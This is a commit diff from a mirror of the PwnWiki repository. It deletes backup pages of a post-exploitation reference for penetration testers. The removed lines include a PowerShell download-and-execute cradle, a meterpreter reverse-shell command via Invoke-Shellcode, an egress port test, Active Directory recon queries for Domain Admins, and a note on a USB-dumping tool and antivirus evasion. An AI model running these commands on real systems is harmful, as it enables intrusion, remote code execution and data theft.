mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
Cleaned up backup files ~, removed the windows.md since there is a dir and index.md file now, cleaned up the powershell.md
This commit is contained in:
webbreacher
parent
ab073a6bb6
commit
656a772d4e
@ -1,7 +0,0 @@
|
||||
# Useful Windows Binaries
|
||||
|
||||
Useful Windows binary tools that can be used for post exploitation.
|
||||
|
||||
| Tool | Description / Importance | Contributer |
|
||||
| ----------- | ------------------------ | ----------- |
|
||||
| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian |
|
||||
40
index.md~
40
index.md~
@ -1,40 +0,0 @@
|
||||
|
||||
|
||||
[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY)
|
||||
|
||||
### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained.
|
||||
|
||||
- - - - - -
|
||||
|
||||
### Live Online Copy:
|
||||
|
||||
You can find a copy of the project online at: http://pwnwiki.io
|
||||
|
||||
### Offline Use:
|
||||
|
||||
1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo
|
||||
2. Open index.html
|
||||
3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine.
|
||||
|
||||
#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS)
|
||||
|
||||
- - - - - -
|
||||
#### Submitting Content
|
||||
We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast.
|
||||
|
||||
We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience!
|
||||
|
||||
- - - - - -
|
||||
Curators:
|
||||
|
||||
* [@mubix](https://twitter.com/mubix)
|
||||
* [@WebBreacher](https://twitter.com/webbreacher)
|
||||
* [@tekwizz123](https://twitter.com/tekwizz123)
|
||||
* [@jakx_](https://twitter.com/jakx_)
|
||||
* [@TheColonial](https://twitter.com/TheColonial)
|
||||
* [@Wireghoul](https://twitter.com/Wireghoul)
|
||||
|
||||
|
||||
If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org)
|
||||
|
||||
[gimmick:ForkMeOnGitHub ({ color: 'red', position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/)
|
||||
@ -1,21 +0,0 @@
|
||||
<!-- Code for collapse and expand -->
|
||||
<script type="text/javascript">
|
||||
$(document).ready(function() {
|
||||
$('div.view').hide();
|
||||
$('div.slide').click(function() {
|
||||
$(this).next('div.view').slideToggle('fast');
|
||||
return false;
|
||||
});
|
||||
});
|
||||
</script>
|
||||
|
||||
# Linux General Persistence Commands
|
||||
|
||||
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
|
||||
|
||||
###Run command as a daemon
|
||||
*Note this doesn't work with anything from apache*
|
||||
```bash
|
||||
setsid *command*
|
||||
```
|
||||
|
||||
@ -1,121 +0,0 @@
|
||||
<!-- Code for collapse and expand -->
|
||||
<script type="text/javascript">
|
||||
$(document).ready(function() {
|
||||
$('div.view').hide();
|
||||
$('div.slide').click(function() {
|
||||
$(this).next('div.view').slideToggle('fast');
|
||||
return false;
|
||||
});
|
||||
});
|
||||
</script>
|
||||
|
||||
# Windows Powershell Commands and Scripts for Post Exploitation
|
||||
|
||||
# One liners
|
||||
|
||||
**Download and Execute Remote Powershell Script**
|
||||
|
||||
```
|
||||
iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")
|
||||
```
|
||||
|
||||
**Download and Save File**
|
||||
|
||||
```
|
||||
(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')
|
||||
```
|
||||
|
||||
**Enumerate Allowed Outbound Ports 1-1024 via [securitypadawan.blogspot.com](http://securitypadawan.blogspot.com/2013/04/quickly-determine-allowed-outbound-ports.html)**
|
||||
|
||||
```
|
||||
$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream();
|
||||
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}
|
||||
```
|
||||
|
||||
**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)**
|
||||
|
||||
```
|
||||
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force
|
||||
```
|
||||
|
||||
----
|
||||
|
||||
# Commands with Sample Output
|
||||
## Hardware
|
||||
### Get BIOS Information
|
||||
* **Command with arguments**: `gwmi win32_bios`
|
||||
* **Description**: Retrieves BIOS information including system serial number.
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> gwmi win32_bios<br>SMBIOSBIOSVersion : 6.00<br>Manufacturer : Phoenix Technologies LTD<br>Name : PhoenixBIOS 4.0 Release 6.0<br>SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc<br>Version : INTEL - 6040000</code></div>
|
||||
|
||||
### Get Drive Information
|
||||
* **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()<br><br>Name : C:\<br>DriveType : Fixed<br>DriveFormat : NTFS<br>IsReady : True<br>AvailableFreeSpace : 55568087552<br>TotalFreeSpace : 55568087552<br>TotalSize : 159876850304<br>RootDirectory : C:\<br>VolumeLabel : <br><br>Name : D:\<br>DriveType : CDRom<br>DriveFormat : <br>IsReady : False<br>AvailableFreeSpace : <br>TotalFreeSpace : <br>TotalSize : <br>RootDirectory : D:\<br>VolumeLabel : <br><br>Name : G:\<br>DriveType : Removable<br>DriveFormat : <br>IsReady : False<br>AvailableFreeSpace : <br>TotalFreeSpace : <br>TotalSize : <br>RootDirectory : G:\<br>VolumeLabel : <br><br>Name : V:\<br>DriveType : Network<br>DriveFormat : NTFS<br>IsReady : True<br>AvailableFreeSpace : 259182640616<br>TotalFreeSpace : 259182640616<br>TotalSize : 827361812256<br>RootDirectory : V:\<br>VolumeLabel : TestMappedDrive</code></div>
|
||||
|
||||
## User Information
|
||||
### Display Username, SID, Last Used
|
||||
* **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto`
|
||||
* **Description**: Retrieves information about system users.
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi<br>on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto<br><br>Name SID LastUseTime localpath<br>---- --- ----------- ---------<br>WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe<br>WIN-244VDGE5OGH S-1-5-20 C:\Windows\ServiceProfiles\Netwo...<br>WIN-244VDGE5OGH S-1-5-19 C:\Windows\ServiceProfiles\Local...<br>WIN-244VDGE5OGH S-1-5-18 C:\Windows\system32\config\syste...</code></div>
|
||||
|
||||
### Translate SID to Username
|
||||
* **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value`
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-<br>1000")).translate([System.Security.Principal.NTAccount])).value<br>WIN-244VDGE5OGH\johndoe</code></div>
|
||||
|
||||
## Using the PowerShell Active Directory Modules
|
||||
### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/
|
||||
### Setting Credentials
|
||||
* **Command with arguments**: `$cred = Get-Credential`
|
||||
* **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules.
|
||||
* **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx)
|
||||
|
||||
### Query to List "Domain Admins"
|
||||
* **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"`
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com<br>name : Administrator<br>objectClass : user<br>objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db<br>SamAccountName : Administrator<br>SID : S-1-5-21-2027135834-1792351174-2509185371-500</code></div>
|
||||
|
||||
### Enumerate All Servers on Domain
|
||||
* **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera
|
||||
tingSystem=*Server*))" |select name`
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>name<br>----<br>PWNT-DC<br>
|
||||
Exchange1<br>
|
||||
SharePoint1</code></div>
|
||||
|
||||
### Get Info About All Connected Drives
|
||||
* **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
|
||||
* **Output**:
|
||||
* <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
|
||||
Name : C:\
|
||||
DriveType : Fixed
|
||||
DriveFormat : NTFS
|
||||
IsReady : True
|
||||
AvailableFreeSpace : 111111111111
|
||||
TotalFreeSpace : 111111111111
|
||||
TotalSize : 111111111111
|
||||
RootDirectory : C:\
|
||||
VolumeLabel : HP
|
||||
<br />
|
||||
Name : D:\
|
||||
DriveType : Fixed
|
||||
DriveFormat : NTFS
|
||||
IsReady : True
|
||||
AvailableFreeSpace : 111111111111
|
||||
TotalFreeSpace : 111111111111
|
||||
TotalSize : 111111111111
|
||||
RootDirectory : D:\
|
||||
VolumeLabel : DATA
|
||||
<br />
|
||||
Name : E:\
|
||||
DriveType : CDRom
|
||||
DriveFormat :
|
||||
IsReady : False
|
||||
AvailableFreeSpace :
|
||||
TotalFreeSpace :
|
||||
TotalSize :
|
||||
RootDirectory : E:\
|
||||
VolumeLabel :
|
||||
</code></div>
|
||||
Loading…
x
Reference in New Issue
Block a user